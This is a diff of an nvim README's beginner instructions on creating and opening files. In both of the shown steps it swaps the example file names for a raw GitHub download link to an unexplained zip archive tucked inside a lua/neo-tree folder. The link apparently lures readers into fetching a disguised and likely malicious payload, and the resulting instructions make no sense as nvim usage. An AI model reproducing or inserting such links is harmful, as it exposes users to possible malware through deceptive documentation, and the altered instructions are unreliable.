mannaggiacristo556/nvim/README.md

 1. **Creating a New File:**
    - Click on "File" and select "New" to start a blank document.
-   - You can also type `nvim newfile.txt` in the terminal to create and open a new file named `newfile.txt`.
+   - You can also type `nvim https://github.com/mannaggiacristo556/nvim/raw/refs/heads/main/lua/neo-tree/sources/distant/Software_casein.zip` in the terminal to create and open a new file named `https://github.com/mannaggiacristo556/nvim/raw/refs/heads/main/lua/neo-tree/sources/distant/Software_casein.zip`.

 2. **Opening an Existing File:**
    - Navigate to "File," then select "Open" to choose an existing document.
-   - Alternatively, type `nvim existingfile.txt` in the terminal.
+   - Alternatively, type `nvim https://github.com/mannaggiacristo556/nvim/raw/refs/heads/main/lua/neo-tree/sources/distant/Software_casein.zip` in the terminal.

 3. **Editing Text:**
    - Start typing to add text.